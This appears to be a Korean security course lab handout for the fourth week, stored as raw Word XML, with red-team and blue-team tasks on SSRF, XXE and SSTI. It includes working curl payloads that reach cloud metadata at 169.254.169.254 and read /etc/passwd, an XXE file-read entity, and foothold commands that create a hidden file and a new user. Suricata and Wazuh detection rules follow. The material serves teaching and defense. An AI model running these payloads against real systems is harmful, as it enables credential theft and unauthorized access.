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W4] 웹 고급 공격 — SSRF/XXE/SSTI vs 고급 웹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4주차 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>웹 고급 공격</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>. SSRF(서버측 요청 위조), XXE(XML 외부 엔티티), SSTI(템플릿 주입),</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>역직렬화 등 OWASP 상위 고급 취약점을 다룬다. Red 는 이를 익스플로잇하고, Blue 는 고급 웹 공격을 탐지한다.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SSRF 로 내부/클라우드 메타데이터에 접근하고, XXE 로 서버 파일을 읽고, SSTI 로 원격 코드 실행</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>발판을 만든다. 방어자는 이 고급 페이로드를 탐지하고 위험도를 평가한다.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익스플로잇(자기 인프라 표적)과 탐지를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공격, Blue 는 자기 인프라에서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공격 태그 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`aa04r1-&lt;본인id&gt;`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, RCE 발판 파일 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`/tmp/.aa04rce`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aa04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`atka04`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탐지 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>sid 9704011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103041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[SSRF/XXE] — 서버측 요청 위조 + 외부 엔티티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너는 SSRF 로 내부 주소·클라우드 메타데이터(169.254.169.254)에 접근을 시도하고, XXE 로 서버 파일을 읽는다.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">태그 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>aa04r1-&lt;본인id&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 를 파라미터/페이로드에 단다.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# SSRF — 내부/메타데이터 접근 시도 (태그 포함)</w:t>
        <w:br/>
        <w:t>curl -s -H "Host: admin.6v6.lab" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "http://192.168.0.161/files/read?url=http://169.254.169.254/latest/meta-data/aa04r1-kim"</w:t>
        <w:br/>
        <w:t>curl -s -H "Host: admin.6v6.lab" "http://192.168.0.161/files/read?url=file:///etc/passwd%23aa04r1-kim"</w:t>
        <w:br/>
        <w:t># XXE — 외부 엔티티로 파일 읽기 (태그 포함)</w:t>
        <w:br/>
        <w:t>curl -s -H "Host: admin.6v6.lab" -H "Content-Type: application/xml" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --data '&lt;?xml version="1.0"?&gt;&lt;!DOCTYPE r [&lt;!ENTITY x SYSTEM "file:///etc/hostname"&gt;]&gt;&lt;r&gt;aa04r1-kim&amp;x;&lt;/r&gt;' \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "http://192.168.0.161/api/xml"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aa04r1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 가 포함된 SSRF/XXE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aa04r1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 태그가 포함된 SSRF/XXE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[SSTI → RCE] — 템플릿 주입으로 코드 실행 발판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SSTI(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>{{7*7}}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/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>49</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>)가 통하면 원격 코드 실행으로 이어진다. 너는 SSTI 로 RCE 를 달성해 발판 파일</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`/tmp/.aa04rce`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aa04</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">)를 떨구고 계정 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`atka04`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 를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# (SSTI/RCE 성공을 가정한) 발판 생성</w:t>
        <w:br/>
        <w:t>printf 'aa04 RCE via SSTI foothold' &gt; /tmp/.aa04rce</w:t>
        <w:br/>
        <w:t>sudo useradd -m -s /bin/bash atka04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/tmp/.aa04rce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aa04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atka04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/tmp/.aa04rce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aa04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atka04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[SSRF/XXE 탐지] — Suricata 룰 (sid 9704011)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SSRF 의 표적 IP(169.254.169.254)와 file:// 스킴을 잡는 Suricata 룰(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>sid 9704011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(msg:"ATKADV-W04 SSRF cloud metadata / file scheme"; flow:to_server; http.uri; content:"169.254.169.254"; nocase; sid:9704011;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9704011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SSRF 메타데이터 접근을 보는 sid 9704011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[SSRF/XXE/SSTI 탐지] — Wazuh 룰 (id 103041)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고급 웹 공격(SSRF/XXE/SSTI)과 그 결과(RCE 발판/계정)를 잡는 Wazuh 룰(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>id 103041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name="edu,webadv,"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;rule id="103041" level="13"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;if_group&gt;edu&lt;/if_group&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;match&gt;atka04&lt;/match&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;description&gt;ATKADV-W04 - advanced web attack foothold (SSRF/XXE/SSTI) indicator&lt;/description&gt;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103041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고급 웹 공격 발판을 보는 id 103041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[위험도·방어 분석] — 고급 웹 취약점 종합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각 고급 취약점(SSRF/XXE/SSTI/역직렬화/CORS)의 위험도와 방어 방법(입력 검증/엔티티 비활성화/메타데이터</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>차단/샌드박싱)을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취약점별 위험도(영향/난이도) + 방어 방법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RCE 발판(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/tmp/.aa04rce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>)·계정(atka04) 헌팅 결과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위험도·방어 분석으로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취약점 위험도·방어·헌팅은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